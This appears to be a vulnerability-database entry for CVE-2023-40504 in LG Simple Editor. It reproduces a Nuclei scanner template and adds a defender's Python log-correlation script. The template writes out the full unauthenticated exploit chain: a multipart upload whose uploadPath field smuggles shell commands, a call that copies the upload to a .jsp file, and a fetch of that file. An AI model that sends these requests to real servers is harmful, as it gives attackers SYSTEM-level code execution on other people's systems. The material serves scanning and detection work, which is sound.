LG Simple Editor <= v3.21.0 - Command Injection

05 Jul 2026 03:01:21 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

LG Simple Editor v3.21.0 Command Injection Vulnerability

id: CVE-2023-40504
info:
  name: LG Simple Editor <= v3.21.0 - Command Injection
  author: s4e-io
  severity: critical
  description: |
    LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
  impact: |
    Unauthenticated attackers can execute arbitrary commands with SYSTEM privileges through the readVideoInfo method by injecting malicious strings in system calls, potentially compromising the entire LG Simple Editor server and connected systems.
  remediation: |
    Update LG Simple Editor to a version newer than 3.21.0 that properly validates user input and prevents command injection in the readVideoInfo method.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-23-1208/
    - https://packetstormsecurity.com/files/180171/LG-Simple-Editor-3.21.0-Command-Injection.html
    - https://0day.today/exploit/39719
    - https://www.usom.gov.tr/bildirim/tr-24-0417
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40504
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-40504
    cwe-id: CWE-78
    epss-score: 0.87761
    epss-percentile: 0.99741
  metadata:
    max-request: 1
    verified: true
    vendor: lg
    product: simple_editor
    fofa-query: icon_hash="159985907"
  tags: cve,cve2023,lg,simple-editor,intrusive,rce,file-upload,vuln

variables:
  filename: "{{rand_base(12)}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"LG Simple Editor")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadVideo"; filename="{{filename}}.bmp"

        /
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadPath"

        /"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../"
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadFile_x"

        1
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadFile_width"

        1
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadFile_height"

        1
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "errorCode","errorMessage","fail")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json

        {"command":"cp","option":"-f","srcPath":"/{{filename}}_original.bmp","destPath":"/{{filename}}.jsp"}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "errorCode","errorMessage","data","success")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /simpleeditor/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022047ce227c4696ad58ea46ad60aad4393085725c980d3f0e08beaaf153bea36797022100d78c6a5b72d90b444af1e95776bdff1549f59942fd01328589239f4396d741ce:922c64590222798bb761d5b6d8e72950
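
A defender-side companion to the template above, added here and not part of the ProjectDiscovery template or LG's code: it correlates, per client, web access-log entries for the upload, copy and root-level `.jsp` fetch requests that the template sends. The Common Log Format layout and the sample lines are assumptions constructed for illustration; access logs carry no request bodies, so a hit is a lead for review, not proof.

```python
import re

# Assumed log layout: Common Log Format, as a Tomcat AccessLogValve can write it.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD = "/simpleeditor/imageManager/uploadVideo.do"
COPY = "/simpleeditor/fileSystem/makeDetailContent.do"
# A .jsp directly in the application root, as in the template's last request.
ROOT_JSP = re.compile(r"^/simpleeditor/[^/]+\.jsp$")

def find_sequences(lines):
    """Return (client, jsp_path) pairs where one client completed the
    upload -> copy -> fetch-JSP sequence with HTTP 200 at each step."""
    stage = {}  # client ip -> steps of the sequence seen so far (0, 1 or 2)
    hits = []
    for raw in lines:
        m = LINE.match(raw)
        if not m or m["status"] != "200":
            continue
        ip, method = m["ip"], m["method"]
        path = m["path"].split("?", 1)[0]  # ignore any query string
        seen = stage.get(ip, 0)
        if method == "POST" and path == UPLOAD:
            stage[ip] = max(seen, 1)
        elif method == "POST" and path == COPY and seen >= 1:
            stage[ip] = 2
        elif method == "GET" and ROOT_JSP.match(path) and seen == 2:
            hits.append((ip, path))
            stage[ip] = 0  # reset so a later sequence is reported separately
    return hits

# Constructed sample log lines (not taken from a real system).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2026:10:00:00 +0000] "GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2026:10:00:01 +0000] "POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1" 200 85',
    '198.51.100.7 - - [01/Jan/2026:10:00:02 +0000] "POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jan/2026:10:00:03 +0000] "GET /simpleeditor/AbCdEfGhIjKl.jsp HTTP/1.1" 200 3',
    '192.0.2.10 - - [01/Jan/2026:10:05:00 +0000] "POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1" 200 85',
    '192.0.2.10 - - [01/Jan/2026:10:05:01 +0000] "GET /simpleeditor/index.jsp HTTP/1.1" 200 2048',
    '203.0.113.4 - - [01/Jan/2026:10:06:00 +0000] "GET /simpleeditor/missing.jsp HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, path in find_sequences(SAMPLE):
        print(f"review {ip}: fetched {path} after upload and copy requests")
```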

04 Feb 2026 07:00 (Current): 7.8 High risk
Vulners AI Score: 7.8
CVSS 3.1: 9.8
CVSS 3: 9.8
EPSS: 0.87761